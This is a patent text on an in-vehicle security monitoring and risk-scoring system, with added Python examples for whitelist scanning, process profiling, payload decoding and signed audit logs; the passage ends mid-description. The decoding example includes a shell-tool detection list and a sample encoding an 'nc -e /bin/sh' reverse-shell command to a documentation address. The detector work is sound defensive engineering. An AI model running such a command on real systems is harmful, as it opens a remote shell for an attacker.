CN-121547771-B - Safety detection and risk assessment system for vehicle-mounted system
Abstract
The invention discloses a vehicle-mounted system security detection and risk assessment system, which belongs to the technical field of vehicle-mounted network security. The system comprises a vehicle-mounted terminal environment sensing module, a vehicle-mounted configuration file and communication whitelist detection module, a vehicle-mounted process and control task analysis module, a communication anomaly detection and encoding identification module, and a security assessment and risk feedback module. The vehicle-mounted terminal environment sensing module acquires multi-level environment information of the vehicle-mounted system, comprising system layer information, network layer information and security layer information. The vehicle-mounted configuration file and communication whitelist detection module is connected to the vehicle-mounted terminal environment sensing module; it establishes and maintains a security whitelist library from the acquired system information and, by periodic scanning, compares the system's current configuration files, dynamic libraries, ports and certificate state against that library in order to detect configuration anomalies and file tampering events. The invention enables comprehensive monitoring and intelligent analysis of the vehicle-mounted system's configuration, process behavior and network communication, and effectively identifies hidden backdoors, abnormal processes and malicious communication.
Inventors
- CHEN HUI
- HUANG HAIJIAO
- HE PENG
- LUO YIMING
- WU HAILIANG
Assignees
- 湖北大学 (Hubei University)
Dates
- Publication Date
- 2026-05-08
- Application Date
- 2026-01-21
Claims (9)
- 1. A vehicle-mounted system security detection and risk assessment system, comprising: a vehicle-mounted terminal environment sensing module, used for collecting multi-level environment information of a vehicle-mounted system, comprising system layer information, network layer information and security layer information; a vehicle-mounted configuration file and communication whitelist detection module, connected to the vehicle-mounted terminal environment sensing module and used for establishing and maintaining a security whitelist library from the collected system information, and for comparing the system's current configuration files, dynamic libraries, ports and certificate state against the security whitelist library by periodic scanning so as to detect configuration anomalies and file tampering events; a vehicle-mounted process and control task analysis module, connected to the vehicle-mounted terminal environment sensing module and used for monitoring system processes in real time, establishing a process behavior profile from the collected process information, and detecting hidden processes, unauthorized processes and abnormal behavior events by comparing the deviation of the current process behavior features from a normal behavior profile established from historical data; a communication anomaly detection and encoding identification module, connected to the vehicle-mounted terminal environment sensing module and used for capturing and analyzing network traffic and for detecting high-entropy traffic, forged commands and anomalous communication by performing encoding identification, entropy analysis and semantic analysis on the payload content, wherein the semantic analysis of the communication anomaly detection and encoding identification module is realized by a multi-modal reasoning model comprising an encoding module, a prediction module and a multi-modal feature module, the encoding module performing text encoding on the text of the traffic content and on a predefined semantic label set comprising normal plaintext communication, encoded/compressed data, encrypted traffic and anomalous instructions, and performing graph encoding on a knowledge subgraph comprising at least one communication rule of port, direction and security level; and a security assessment and risk feedback module, connected respectively to the vehicle-mounted configuration file and communication whitelist detection module, the vehicle-mounted process and control task analysis module and the communication anomaly detection and encoding identification module, and used for performing data fusion and weighted evaluation of the anomaly events output by those modules, calculating a composite risk score, and executing the corresponding risk response strategy according to the score grade.
- 2. The vehicle-mounted system security detection and risk assessment system according to claim 1, wherein the multi-level acquisition structure of the vehicle-mounted terminal environment sensing module comprises: a system layer acquisition unit, used for identifying the operating system type, kernel version, process snapshot and file system metadata by reading system files or command output; a network layer acquisition unit, used for collecting the physical and virtual network interface information, IP/MAC addresses, port listening states and interface security configuration of the vehicle-mounted device; and a security layer acquisition unit, used for collecting system certificates and signature information, security policy states, user privileges and audit logs.
- 3. The vehicle-mounted system security detection and risk assessment system according to claim 2, wherein the detection period of the periodic scanning performed by the vehicle-mounted configuration file and communication whitelist detection module is 10 minutes, and the detection objects include the hash values of files under key directories, the dynamic library paths loaded by processes, the system's listening ports, and the validity and signatures of digital certificates.
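The periodic whitelist scan of claim 3, as an added example that is not the patent's own implementation: a baseline of file hashes under a key directory, loaded dynamic library paths and listening ports is recorded once, and each scan recomputes the same view and reports every deviation as an anomaly event. The key directory, its contents and the library and port snapshots are constructed for the example; certificate validity and signature checks, which the claim also lists, are not shown.

```python
"""Whitelist baseline and periodic scan (added example, not the patent's code).

The directory tree, the loaded-library list and the listening-port set in
demo() are constructed so the example runs offline.
"""
import hashlib
import tempfile
from pathlib import Path

SCAN_INTERVAL_SECONDS = 600   # claim 3: one scan every 10 minutes


def hash_tree(root):
    """Map relative path -> SHA-256 hex digest for every regular file under root
    (symlinks are skipped so a planted link cannot pull in an external file)."""
    digests = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and not path.is_symlink():
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[str(path.relative_to(root))] = h.hexdigest()
    return digests


def build_baseline(root, loaded_libs, listen_ports):
    """Snapshot of the known-good state; copies are taken so later mutation
    of the caller's lists cannot silently rewrite the whitelist."""
    return {"files": hash_tree(root), "libs": set(loaded_libs), "ports": set(listen_ports)}


def scan(baseline, root, loaded_libs, listen_ports):
    """Compare the current state with the baseline; return (event_type, detail) tuples."""
    events = []
    current = hash_tree(root)
    for rel, digest in current.items():
        if rel not in baseline["files"]:
            events.append(("file_added", rel))
        elif digest != baseline["files"][rel]:
            events.append(("file_modified", rel))
    for rel in baseline["files"].keys() - current.keys():
        events.append(("file_deleted", rel))
    for lib in set(loaded_libs) - baseline["libs"]:
        events.append(("unknown_library", lib))
    for port in set(listen_ports) - baseline["ports"]:
        events.append(("unexpected_listen_port", f"tcp/{port}"))
    return events


def demo():
    """Build a baseline, simulate tampering, and return the sorted scan events."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "etc").mkdir()
        (root / "etc" / "vehicle.conf").write_text("telematics=on\n")
        (root / "bin").mkdir()
        (root / "bin" / "ota-agent").write_bytes(b"\x7fELF-stub")          # constructed content
        libs = ["/usr/lib/libssl.so.3", "/usr/lib/libcan.so"]             # constructed snapshot
        ports = {22, 8443}                                                 # constructed snapshot
        baseline = build_baseline(root, libs, ports)

        # Simulated compromise: config edited, new binary dropped, hook library loaded, new listener.
        (root / "etc" / "vehicle.conf").write_text("telematics=on\ndebug_shell=1\n")
        (root / "bin" / "shadow-svc").write_bytes(b"\x7fELF-stub2")
        libs.append("/tmp/.x/libhook.so")
        ports.add(4444)
        return sorted(scan(baseline, root, libs, ports))


if __name__ == "__main__":
    for event in demo():
        print(event)
```

On a real head unit the library list comes from each process's memory map (`/proc/<pid>/maps` on Linux) and the port set from the socket tables; the scan function itself is unchanged, and a scheduler calls it every `SCAN_INTERVAL_SECONDS`. The baseline must be stored somewhere the scanned system cannot write, or an attacker who can tamper with files can re-baseline the tampered state.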
- 4. The vehicle-mounted system security detection and risk assessment system according to claim 3, wherein establishing the process behavior profile by the vehicle-mounted process and control task analysis module comprises collecting the PID, process name, executable path, resource occupancy, user privilege, parent-child relationship and communication direction of each process and packing these multi-dimensional features into a behavior vector; and the abnormal behavior events comprise: a process whose executable path has been deleted but which is still running; a non-system user starting a system task; and a process frequently accessing an unknown IP or a high-risk port, which is marked as a potential command execution event.
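The behavior vector, historical profile and the three abnormal-behavior rules of claim 4, as an added example that is not the patent's code. Each process record mirrors what Linux exposes under /proc: the executable path is the readlink target of /proc/<pid>/exe, which the kernel suffixes with " (deleted)" when the binary has been unlinked. The historical snapshots, the current snapshot, the system-task directories, the high-risk port list, the known backend IPs and the z-score cutoff are all constructed assumptions; the hidden-process check (a PID that answers a direct probe but is absent from the /proc listing) is included as the usual way of detecting the hidden processes claim 1 mentions.

```python
"""Process behaviour profile and anomaly rules (added example, not the patent's code).

HISTORY and SNAPSHOT are constructed records; the whitelists are assumptions.
"""
import statistics

SYSTEM_TASK_DIRS = ("/usr/sbin/", "/sbin/")      # assumption: where system tasks are installed
HIGH_RISK_PORTS = {4444, 1337, 31337, 6667}      # assumption: ports commonly used by C2 tooling
KNOWN_IPS = {"10.0.0.1", "203.0.113.10"}         # assumption: fleet backend addresses
Z_THRESHOLD = 3.0                                # assumption: deviation cutoff in standard deviations


def behavior_vector(rec):
    """Pack the per-process features of claim 4 into a numeric vector:
    cpu %, mem %, number of remote connections, runs-as-root flag."""
    return (rec["cpu"], rec["mem"], len(rec["conns"]), float(rec["uid"] == 0))


def build_profile(history):
    """Per process name, the mean and population stdev of every vector component."""
    by_name = {}
    for rec in history:
        by_name.setdefault(rec["name"], []).append(behavior_vector(rec))
    return {name: [(statistics.mean(col), statistics.pstdev(col)) for col in zip(*vecs)]
            for name, vecs in by_name.items()}


def deviation(rec, profile):
    """Largest per-component z-score against the profile; None if the name is unprofiled.
    A component that never varied historically yields inf on any change."""
    stats = profile.get(rec["name"])
    if stats is None:
        return None
    zs = []
    for x, (mu, sigma) in zip(behavior_vector(rec), stats):
        if sigma > 0:
            zs.append(abs(x - mu) / sigma)
        else:
            zs.append(0.0 if x == mu else float("inf"))
    return max(zs)


def rule_events(rec):
    """The three explicit abnormal-behaviour events listed in claim 4."""
    events = []
    if rec["exe"].endswith(" (deleted)"):
        events.append("deleted_executable_running")
    if rec["uid"] != 0 and rec["exe"].startswith(SYSTEM_TASK_DIRS):
        events.append("system_task_by_non_system_user")
    if any(ip not in KNOWN_IPS or port in HIGH_RISK_PORTS for ip, port in rec["conns"]):
        events.append("potential_command_execution")
    return events


def hidden_pids(listed_pids, probed_pids):
    """PIDs that respond to a direct probe (e.g. kill(pid, 0)) but are missing
    from the /proc directory listing: the classic sign of a PID-hiding rootkit."""
    return sorted(set(probed_pids) - set(listed_pids))


def analyze(snapshot, profile):
    """Map pid -> list of events for every process that triggered something."""
    findings = {}
    for rec in snapshot:
        events = rule_events(rec)
        dev = deviation(rec, profile)
        if dev is None:
            events.append("unprofiled_process")
        elif dev > Z_THRESHOLD:
            events.append("profile_deviation")
        if events:
            findings[rec["pid"]] = events
    return findings


def _rec(pid, name, exe, uid, cpu, mem, conns):
    return {"pid": pid, "name": name, "exe": exe, "uid": uid, "ppid": 1,
            "cpu": cpu, "mem": mem, "conns": conns}


HISTORY = [  # constructed historical snapshots used to build the normal profile
    _rec(100, "telematicsd", "/usr/sbin/telematicsd", 0, 2.0, 1.0, [("10.0.0.1", 8443)]),
    _rec(100, "telematicsd", "/usr/sbin/telematicsd", 0, 3.0, 1.1, [("10.0.0.1", 8443)]),
    _rec(100, "telematicsd", "/usr/sbin/telematicsd", 0, 2.0, 1.0, [("10.0.0.1", 8443)]),
    _rec(100, "telematicsd", "/usr/sbin/telematicsd", 0, 3.0, 1.1, [("10.0.0.1", 8443)]),
    _rec(300, "cron", "/usr/sbin/cron", 0, 0.1, 0.2, []),
    _rec(300, "cron", "/usr/sbin/cron", 0, 0.1, 0.2, []),
    _rec(300, "cron", "/usr/sbin/cron", 0, 0.1, 0.2, []),
]
SNAPSHOT = [  # constructed current snapshot: one clean process, two bad ones
    _rec(100, "telematicsd", "/usr/sbin/telematicsd", 0, 2.5, 1.05, [("10.0.0.1", 8443)]),
    _rec(200, "updater", "/usr/sbin/updater (deleted)", 0, 1.0, 0.5, [("198.51.100.7", 4444)]),
    _rec(300, "cron", "/usr/sbin/cron", 1000, 0.1, 0.2, []),
]


def demo():
    return analyze(SNAPSHOT, build_profile(HISTORY))
```

The cron entry shows why the profile and the rules are complementary: the rule catches the non-root user directly, and the profile flags the same process because its runs-as-root component never varied in history, so any change is an infinite z-score. Processes with no history are reported as unprofiled rather than scored, which is the safer default during the learning phase claim 8 describes.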
- 5. The vehicle-mounted system security detection and risk assessment system according to claim 4, wherein the content parsing and encoding identification of the communication anomaly detection and encoding identification module supports recursive decoding of at least one encoding or compression format selected from Base64, hex, URL encoding, gzip and zlib, and marks the content as suspicious when a predetermined illegal character combination occurs in the decoded content.
- 6. The vehicle-mounted system security detection and risk assessment system according to claim 5, wherein the entropy analysis of the communication anomaly detection and encoding identification module comprises calculating the Shannon entropy of each decoded data block and calculating an anomaly score from the entropy range, the proportion of printable characters and character set compatibility features by a preset weighting formula, wherein a data block whose entropy exceeds 4.5 is determined to be high-entropy data.
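The recursive decoding of claim 5 and the entropy scoring of claim 6, as one added example that is not the patent's implementation. The 4.5-bit threshold is the one stated in claim 6; the illegal-pattern list, the weights, the scaling of each feature to [0, 1] and the recursion and inflation limits are assumptions. The inflation cap is the caveat a practitioner wants here: a recursive decoder that inflates gzip or zlib layers without a bound turns the detector itself into a denial-of-service target on a memory-constrained head unit.

```python
"""Recursive payload decoding and entropy-based anomaly score
(added example, not the patent's code). Sample payloads are constructed."""
import base64
import binascii
import gzip
import math
import string
import urllib.parse
import zlib

HIGH_ENTROPY = 4.5                  # claim 6 threshold, bits per byte
MAX_DEPTH = 5                       # assumption: bound on nested encodings
MAX_INFLATED = 1_000_000            # assumption: output cap per compression layer
PRINTABLE = set(string.printable.encode())
ILLEGAL_PATTERNS = (b"/bin/sh", b"bash -i", b"nc -e", b"$(", b"&&")     # assumption: constructed list
WEIGHTS = {"entropy": 0.5, "unprintable": 0.3, "charset": 0.2}            # assumption: preset weights


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def _inflate(data: bytes, wbits: int):
    """Inflate one gzip (wbits=31) or zlib (wbits=15) layer; None if invalid,
    truncated, or larger than MAX_INFLATED (decompression-bomb guard)."""
    d = zlib.decompressobj(wbits)
    try:
        out = d.decompress(data, MAX_INFLATED)
    except zlib.error:
        return None
    if d.unconsumed_tail or not d.eof:
        return None
    return out


def decode_once(data: bytes):
    """(format, decoded) for the first format that accepts the data, else None."""
    if data[:2] == b"\x1f\x8b":
        out = _inflate(data, 31)
        return ("gzip", out) if out is not None else None
    if len(data) >= 2 and data[0] & 0x0F == 8 and ((data[0] << 8) | data[1]) % 31 == 0:
        out = _inflate(data, 15)            # zlib header check can match text by chance,
        if out is not None:                 # so fall through when inflation fails
            return ("zlib", out)
    if len(data) >= 4 and len(data) % 2 == 0 and all(b in b"0123456789abcdefABCDEF" for b in data):
        return ("hex", bytes.fromhex(data.decode()))
    if len(data) >= 8 and len(data) % 4 == 0:
        try:
            return ("base64", base64.b64decode(data, validate=True))
        except (binascii.Error, ValueError):
            pass
    if b"%" in data:
        out = urllib.parse.unquote_to_bytes(data)
        if out != data:
            return ("url", out)
    return None


def decode_chain(data: bytes):
    """Peel encoding layers recursively; returns (innermost bytes, formats peeled)."""
    chain = []
    while len(chain) < MAX_DEPTH:
        step = decode_once(data)
        if step is None or not step[1]:
            break
        chain.append(step[0])
        data = step[1]
    return data, chain


def analyze_payload(payload: bytes) -> dict:
    data, chain = decode_chain(payload)
    entropy = shannon_entropy(data)
    printable_ratio = sum(b in PRINTABLE for b in data) / len(data) if data else 1.0
    try:
        data.decode("utf-8")
        charset_ok = True
    except UnicodeDecodeError:
        charset_ok = False
    # Entropy feature counts only the excess above the 4.5-bit threshold, scaled to [0, 1].
    e_feat = min(max((entropy - HIGH_ENTROPY) / (8.0 - HIGH_ENTROPY), 0.0), 1.0)
    score = (WEIGHTS["entropy"] * e_feat
             + WEIGHTS["unprintable"] * (1.0 - printable_ratio)
             + WEIGHTS["charset"] * (0.0 if charset_ok else 1.0))
    flags = []
    if entropy > HIGH_ENTROPY:
        flags.append("high_entropy")
    if any(p in data for p in ILLEGAL_PATTERNS):
        flags.append("illegal_combination")
    return {"chain": chain, "entropy": round(entropy, 3), "printable_ratio": printable_ratio,
            "charset_ok": charset_ok, "score": round(score, 4), "flags": flags}


# Constructed samples: a shell command hidden under hex then Base64, a uniform
# byte block standing in for ciphertext, a small gzip layer, and a gzip bomb.
SAMPLE_C2 = base64.b64encode(b"nc -e /bin/sh 198.51.100.7 4444".hex().encode())
SAMPLE_CIPHERTEXT = bytes(range(256))
SAMPLE_GZIP = gzip.compress(b"hello")
SAMPLE_BOMB = gzip.compress(b"A" * 2_000_000)
```

The two signals are deliberately independent: the command-and-control sample decodes to low-entropy plaintext and scores 0.0, yet is flagged by the illegal-pattern check, while the ciphertext-like block carries no pattern but scores high on entropy. The bomb sample is left undecoded because its inflated size would exceed `MAX_INFLATED`, which is exactly the behaviour wanted on an embedded target.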
- 7. The vehicle-mounted system security detection and risk assessment system according to claim 6, wherein in the weighted evaluation of the security assessment and risk feedback module the composite risk score is calculated as Score = 0.3 × communication anomaly score + 0.25 × configuration anomaly score + 0.25 × process anomaly score + 0.1 × system risk score + 0.1 × AI confidence score, and the result is normalized to the interval 0-1.
- 8. The vehicle-mounted system security detection and risk assessment system according to claim 7, wherein the security assessment and risk feedback module executes a tiered response strategy according to the composite risk score, comprising: when the score is in the high-risk interval 0.7-1.0, immediately cutting off the external communication interfaces and freezing suspicious processes; when the score is in the medium-risk interval 0.4-0.7, recording an event log and uploading it to the cloud security center; and when the score is in the low-risk interval 0.0-0.4, recording locally and using the record as a learning sample for optimizing the risk model.
- 9. The vehicle-mounted system security detection and risk assessment system according to claim 8, wherein the detection reports and all response operations output by the security assessment and risk feedback module are recorded in an audit log, and each audit log entry is accompanied by a timestamp and a signature hash.
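The score fusion of claim 7, the tiered response of claim 8 and the signed audit entry of claim 9, as one added example that is not the patent's code. The weights and the score bands are those stated in the claims. The following are assumptions made for the example: how several events from one module collapse into that module's score (a noisy-OR of per-event severities), the boundary rule for a score that falls exactly on 0.4 or 0.7 (the claim's intervals 0.4-0.7 and 0.7-1.0 both contain 0.7, so the example assigns boundary scores to the higher band), the HMAC-SHA256 construction used as the "signature hash", and the audit key, which in practice would be provisioned per vehicle and kept outside the scanned filesystem.

```python
"""Composite risk score, tiered response and HMAC-signed audit records
(added example, not the patent's code)."""
import hashlib
import hmac
import json
import time

WEIGHTS = {"communication": 0.30, "configuration": 0.25, "process": 0.25,
           "system": 0.10, "ai_confidence": 0.10}            # claim 7
BANDS = ((0.7, "high"), (0.4, "medium"), (0.0, "low"))        # claim 8 lower bounds
RESPONSES = {                                                 # claim 8 actions per band
    "high": ["cut_external_interfaces", "freeze_suspicious_processes"],
    "medium": ["log_event", "upload_to_cloud_security_center"],
    "low": ["log_locally", "queue_as_training_sample"],
}
AUDIT_KEY = b"example-audit-key-not-for-production"            # assumption: per-vehicle secret


def fuse_module(severities):
    """Assumed fusion rule: noisy-OR of per-event severities in [0, 1], so several
    weak events add up while one strong event dominates."""
    p = 1.0
    for sev in severities:
        p *= 1.0 - min(max(sev, 0.0), 1.0)
    return 1.0 - p


def composite_score(module_scores):
    """Claim 7 weighted sum; inputs missing from the dict count as 0. The weights
    sum to 1, so the clamp only guards against out-of-range inputs."""
    s = sum(WEIGHTS[k] * module_scores.get(k, 0.0) for k in WEIGHTS)
    return min(max(s, 0.0), 1.0)


def risk_band(score):
    """Map a score to its band; a score exactly on a boundary takes the higher band (assumption)."""
    for lower, name in BANDS:
        if score >= lower:
            return name
    return "low"


def _canonical(body):
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def audit_record(report, actions, ts=None):
    """Claim 9 entry: timestamp plus a signature hash over the canonical JSON body."""
    body = {"ts": ts if ts is not None else int(time.time()), "report": report, "actions": actions}
    body["sig"] = hmac.new(AUDIT_KEY, _canonical(body), hashlib.sha256).hexdigest()
    return body


def verify_audit(record):
    """True only if the entry's signature matches its current contents."""
    sig = record.get("sig")
    body = {k: v for k, v in record.items() if k != "sig"}
    expected = hmac.new(AUDIT_KEY, _canonical(body), hashlib.sha256).hexdigest()
    return sig is not None and hmac.compare_digest(sig, expected)


def assess(events_by_module, system_risk, ai_confidence, ts=None):
    """Fuse per-module events, score, pick the response, and emit the signed audit entry."""
    scores = {k: fuse_module(v) for k, v in events_by_module.items()}
    scores["system"] = system_risk
    scores["ai_confidence"] = ai_confidence
    score = composite_score(scores)
    band = risk_band(score)
    report = {"module_scores": {k: round(v, 4) for k, v in scores.items()},
              "score": round(score, 4), "band": band}
    return audit_record(report, RESPONSES[band], ts)


if __name__ == "__main__":
    # Constructed event severities: two communication anomalies, one config, one process.
    entry = assess({"communication": [0.9, 0.5], "configuration": [0.6], "process": [0.8]},
                   system_risk=0.3, ai_confidence=0.7)
    print(json.dumps(entry, indent=2))
```

Because the high band cuts external interfaces and freezes processes, the fusion rule and the boundary rule matter operationally: a noisy-OR pushes a module's score toward 1 once it reports several medium events, and a boundary rule that rounds up means 0.7 triggers the most disruptive response. Both should be reviewed against false-positive cost before deployment, and the audit key must not live where claim 3's whitelist scan could be bypassed, or the signed log proves nothing.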
Description
Safety detection and risk assessment system for vehicle-mounted system
Technical Field
The invention relates to the technical field of vehicle-mounted network security, and in particular to a vehicle-mounted system security detection and risk assessment system.
Background
With the rapid development of intelligent connected vehicles, vehicles have evolved into complex "mobile computing terminals" that integrate multiple computing units, infotainment systems, V2X communication modules and cloud service interfaces. The Internet of Vehicles environment makes the attack surface increasingly dispersed and aggravates device heterogeneity. To make function extension convenient, vehicle-mounted systems widely adopt dynamic loading mechanisms, but these also give an attacker the opportunity to disguise a backdoor. In addition, as the amount of vehicle-mounted software grows, users may inadvertently install seemingly trusted software that has been tampered with or implanted with a rootkit, producing backdoors that are highly concealed and long-latent and that traditional detection methods based on signatures or fixed rules cannot cope with effectively. Existing vehicle-mounted security schemes focus on single-level protection, such as a network firewall, an intrusion detection system (IDS) or simple file integrity verification, and lack the ability to analyze system configuration, process behavior and network traffic collaboratively with multi-modal reasoning. There is therefore an urgent need for a vehicle-mounted system security detection scheme that deeply fuses the static configuration, dynamic running state and network communication content of the system and performs anomaly reasoning through an intelligent model. To this end, the present invention provides a vehicle-mounted system security detection and risk assessment system to solve the above problems.
Disclosure of Invention
The invention aims to provide a vehicle-mounted system security detection and risk assessment system that enables comprehensive monitoring and intelligent analysis of vehicle-mounted system configuration, process behavior and network communication, and effectively identifies hidden backdoors, abnormal processes and malicious communication, so as to solve the problems described in the background. To achieve this purpose, the present invention provides the following technical solution: a vehicle-mounted system security detection and risk assessment system, comprising: a vehicle-mounted terminal environment sensing module, used for collecting multi-level environment information of a vehicle-mounted system, comprising system layer information, network layer information and security layer information; a vehicle-mounted configuration file and communication whitelist detection module, connected to the vehicle-mounted terminal environment sensing module and used for establishing and maintaining a security whitelist library from the collected system information, and for comparing the system's current configuration files, dynamic libraries, ports and certificate state against the security whitelist library by periodic scanning so as to detect configuration anomalies and file tampering events; a vehicle-mounted process and control task analysis module, connected to the vehicle-mounted terminal environment sensing module and used for monitoring system processes in real time, establishing a process behavior profile from the collected process information, and detecting hidden processes, unauthorized processes and abnormal behavior events by comparing the deviation of the current process behavior features from a normal behavior profile established from historical data; a communication anomaly detection and encoding identification module, connected to the vehicle-mounted terminal environment sensing module and used for capturing and analyzing network traffic, and for detecting high-entropy traffic, forged commands and anomalous communication by performing encoding identification, entropy analysis and semantic analysis on the payload content; and a security assessment and risk feedback module, connected respectively to the vehicle-mounted configuration file and communication whitelist detection module, the vehicle-mounted process and control task analysis module and the communication anomaly detection and encoding identification module, and used for performing data fusion and weighted evaluation of the anomaly events output by those modules, calculating a composite risk score, and executing the corresponding risk response strategy according to the score grade. As a further scheme of the invention, the multi-level acquisition structure of the vehicle-mounted terminal environment sensing module comprises the following components: a system layer acquisition unit, used for identifying the operating system type, the kernel version,